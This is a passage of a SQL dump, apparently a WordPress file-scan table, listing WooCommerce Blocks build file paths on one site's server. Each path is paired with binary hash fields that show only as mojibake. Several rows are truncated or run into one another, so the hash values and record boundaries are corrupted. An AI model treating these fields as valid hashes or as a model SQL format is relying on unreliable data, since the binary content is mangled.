revious.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' J C ','vi,,C$DA^','',0,'?'),(',Og\r$~0)\"','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R3`B\\7t1',' i9xjA791߬e`\r\"','',0,'?'),('N .P$`gLHo','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-next-previous.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9R0x]i@⪧','\\9O!W?K(ۙeo','',0,'?'),('07)ǙjN','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 7 IO0:sxK','$ F٩R/:2Þ\",\0.^3nI','',0,'?'),('\'C@!+Kx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.f\"@','`1s+a)]xZ\\gt','',0,'?'),('tg\ne\0GI;]b','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!&A%U_','CmH.eisa5q@\Z`*','',0,'?'),('xb(AaR37n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-large-image.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1kD `ky䱗','iU','',0,'?'),(' Az˅k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#R;K5\0@','z9u{\n`\"]+PQ /-','',0,'?'),('up䇘ʸo','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P֢VvҜ1','ӊbƹl\\|E','',0,'?'),('= 6핝o R','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xZ7\n̈p9','͢ղPKڗ\rx倃5+*G~vd<','',0,'?'),('OB\\ \"ԥ<`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-gallery-pager.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z}9-+{Y','jADkwEO8-','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Ҥf','lopi\0}B NsnWaU]','',0,'?'),('`%^d ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w$e@{XӮiX','\Zd<\r])m$ޔ','',0,'?'),('\ZM)j(ZV','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2v4D2S[k','th9[DGZooA6wO %{\04r\ZE','',0,'?'),('>.K\\','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z#5shS+C ','^`0)sk#\ZVdTЫuЭ7','',0,'?'),('\'i8m-j','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':/1-Nva','*yV=S#FovZr=','',0,'?'),('_R5YӚR ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_= !)',' {rlrFGo*% |=8\'','',0,'?'),('+ZU\"=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Eg.Sު3o ','p5Ut]&|n','',0,'?'),('P}P/:B','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1sB˥[+ȸzh','\\|%F^q梼ckC 5G','',0,'?'),('I_n )Ɲ\Z]{(','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D*dWRL69[z4@','04י$*!\0\nܐDΐI?o{;','',0,'?'),('+.\'p Ix S','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-price.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#-x','m[Tlb:5%{nݮpQ:u$D','',0,'?'),('h|?Tp/N','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5 &g3ߖ4','O`)ЀP/HrFϩs\nU{@08','',0,'?'),('kWsr\nʳU','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k[쐓WK*','2*7\ZLU59o百acזEd','',0,'?'),('\n(K ~ x','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ḟ(g','!9r\0f=\"prp\\k(\rTmx','',0,'?'),('7^OV[*D;ä`r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gKܴd4lx\"','LTB2,mGe6w ','',0,'?'),('lct`ia;s@','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-query.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UoXB\"1','O:=q_2\0YNf_k','',0,'?'),('R','',0,'?'),('e>C ;<;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$rO9:V','\\\\lPJQhlx]5%fN','',0,'?'),('\0mxۜ}w','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZiF.2l','ۋI()jBZ \'gV','',0,'?'),('נf f0r5f','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SPh!vm','y> w}0&$ fL\'u(7vr;','',0,'?'),('S4 ^^\0`GbH','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rw\"4ߦu','~4/Z] -#SNd(i!','',0,'?'),('2Ouӣz^','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating-stars-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lŋ,ߏo[q','Kbl^ɹL\\(k\0h.\\~Y','',0,'?'),('UA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-rating.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','±W:úo$','5w\'','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54ח#zS#m~hb','@6=B1\\Ȕ,îq\Z','',0,'?'),('dȧ60NO','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̠1 i=\0','5,2qCՌ?\'&UO','',0,'?'),('!\'^/p! ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-results-count-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CLx{g4`G','ANBL$P\\,^c$','',0,'?'),('\n<','\'{O6\'\\mjWzц6P=//','',0,'?'),(')2 bJ\09','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-reviews.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f*]To~DL !','OE7lL _4eJA! M','',0,'?'),('f^qb\r N#Ya','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؆Fox','Y=\nX^AƪR (jG^','',0,'?'),('32R\Z G','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rbT|%Mrs','oD =)MGxD\"Vi','',0,'?'),('/dpIҹ7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-sale-badge.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VW@/``_(K','O(ek_;b','',0,'?'),('lP׀ił\\','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(=gI\nă(','B@ x=OϗȵJcRR','',0,'?'),('O _a\r!','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':|o3|c','|TvO# :HMQ`i)','',0,'?'),('T\rhX@a]U','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-stock-indicator.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#ge x',';-','',0,'?'),('篼\' &','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mid$|0?','c81A=;8o2\r?*(6&/(cٱ','',0,'?'),('zS;㷂8NCp ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\\' -_','3h,E*.$s ~Ke!','',0,'?'),(',X#ck.`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\rmp\"','\ZfmE ~*ߎչ]3E','',0,'?'),('F%Ѹ)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-summary.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ε`y7\r\Z','^j^\r8 QmDr-Nkf1l','',0,'?'),('ng1X','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','“G{ű','>P**^oiƣ3xa v','',0,'?'),('Ȇx{\0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j-};Pc7','7Fv*r]Uĭ+z 5','',0,'?'),('ncw>;ZMPt̯(','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hpq@g,2r&','9dk B]]}uSSPDdW','',0,'?'),('\rxsv+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V]4J/tC0P4','6=\Z3xGæ<\'Ş(jQ#','',0,'?'),('XZ{^ 1k','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ]-zSH2W','Pv FYA;PUZ[@B','',0,'?'),('a \'p>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-template.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n5!ݐE','ŦD\03ijᆛIo]_&-2','',0,'?'),('?9(ˎk','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zfY{{~ ','2A zqثyb.\"5yqD','',0,'?'),('ŀa3D>\Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǹ a\n\" \nn','U\ZD쯧.1\rn/!p:OZz','',0,'?'),('wY8w','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X y..^','9B\\Y\\#\" 㣛Pg[c4f','',0,'?'),('J\n^?N3jHm','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-title.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FEt$H','’>2B+hy8moB','',0,'?'),('y = m0]S','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','״cΊS&','9ymH̨.\'_3Y0[8!ɵ~','',0,'?'),('B?6nq,c9','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{yuYۤiL','\"XwO\n}4;[ul>t3','',0,'?'),('d~]Aw;\'\"[+n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kCy=Dzs','/\Z籰i\'>ΣA`gDΈ','',0,'?'),('p@\nW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q) ނ[\nO','ޕe?qREf2oۋQN!lZ?','',0,'?'),('i4\Zg ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ļ|N&p3\r[Hn ','\\WP4%1r=>E_oel','',0,'?'),('/s24\rJQ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E&gK','\0H^2Tr3CiؗdDːJb','',0,'?'),('o \Z. V c','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a}g5P\'o','y LhBjc;M#Ta{@','',0,'?'),('W]ZR*ی([\n','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~?.K/Sm','tgx{\Zʙ#/Z+ _0L1zJ','',0,'?'),('$JT7gѵ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ȩω?',' }(&hC3g;\ZpXwO> ','',0,'?'),('DϒGI!ߊ\Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|JG 0F*7','^Z+PeDYYz\" ','',0,'?'),('3џ\rý,E|','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-frontend.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' g> ','HVj8jH\"Ě#=(1v','',0,'?'),('_F\ry\nTݘ#PE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȱĭ|M\\g',' Y̴+^+-9d','',0,'?'),('\"0]՟Ww?i2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter-wrapper.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(|ۂt0x-=~','Ls( y1s@Jd?Sj#EZ۞','',0,'?'),('6\Z>hӮn !s','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(n[4K*l ','4Oo4SAG+CC<\\J','',0,'?'),('X;],I','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>,b{\"P|R','t@Y(wUO\r%','',0,'?'),('Wby$x_s$','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/rating-filter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SJt@пV+L\Z','y:ϋt\na(LP/ ','',0,'?'),('I5\\4BU/','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/related-products/block.json','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/related-products/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s4\n1gEhYs','n?G8>v\0ZxLRk','',0,'?'),('Utq8{Gl','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' /(ahcz%$w','\'b%-[&;\0iJ2Q#S~L','',0,'?'),('5򙤠QJi3','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d>س#T]#n|','\"@펠\0\0lApN+E`/B=Z .(','',0,'?'),('6i\0Cg\\V','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nMh\rbh','\"&\nuns+D=r^,\'6R','',0,'?'),('3\0@=E','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N#NB3/','n]_’ 6>TĺvrBʽ','',0,'?'),('GXL)_,','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-category.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Fb!o','cd͡j&ކ%,!š*q','',0,'?'),('01t{sjsg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' /(ahcz%$w','\'b%-[&;\0iJ2Q#S~L','',0,'?'),('Zn0/>e','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-style.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product-style.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IXzK>_/','C1_\01(0ȊR@<й97_!','',0,'?'),('\r]@LG۴ddK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.asset.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m.s#\\\0x ',')ңYm!@^v>`sRm','',0,'?'),('[!\0\'F','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.css','/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/reviews-by-product.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N#NB3/','n]_’ 